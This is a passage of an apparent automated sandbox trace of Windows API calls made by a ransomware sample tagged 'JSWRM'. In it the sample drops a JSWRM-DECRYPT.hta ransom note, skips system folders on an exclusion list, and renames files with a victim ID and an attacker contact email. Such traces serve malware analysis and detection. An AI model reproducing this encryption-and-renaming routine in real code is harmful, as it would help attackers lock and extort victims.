lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.127] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.127] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.129] CloseHandle (hObject=0x454) returned 1 [0069.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0069.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0069.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0069.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0069.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.131] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232100 [0069.131] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.131] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.132] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.132] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fdc097c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fdc097c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fde6e20, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.132] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.132] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.132] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9483e2, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0069.132] lstrcmpiW (lpString1="msader15.dll.mui", lpString2=".") returned 1 [0069.132] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="..") returned 1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="...") returned 1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="windows") returned -1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="recovery") returned -1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="perflogs") returned -1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="documents and settings") returned 1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="system volume information") returned -1 [0069.133] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="msocache") returned -1 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll.mui", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msader15.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll.mui", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msader15.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.134] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9661580474209608) returned 0 [0069.134] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.134] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.134] CloseHandle (hObject=0xffffffff) returned 1 [0069.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0069.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0069.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.135] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.135] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9483e2, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0069.135] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0069.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.135] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fdc097c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fdc097c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.135] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.136] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.136] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.136] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.136] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.136] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2=".") returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="..") returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="...") returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="windows") returned -1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="recovery") returned -1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="perflogs") returned -1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="documents and settings") returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="system volume information") returned -1 [0069.136] lstrcmpiW (lpString1="msader15.dll", lpString2="msocache") returned -1 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msader15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msader15.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msader15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.137] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xced4b5c5, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x12d400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2=".") returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="..") returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="...") returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="windows") returned -1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="recovery") returned -1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="perflogs") returned -1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="documents and settings") returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="system volume information") returned -1 [0069.137] lstrcmpiW (lpString1="msado15.dll", lpString2="msocache") returned -1 [0069.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado15.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado15.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado15.dll", lpUsedDefaultChar=0x0) returned 11 [0069.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 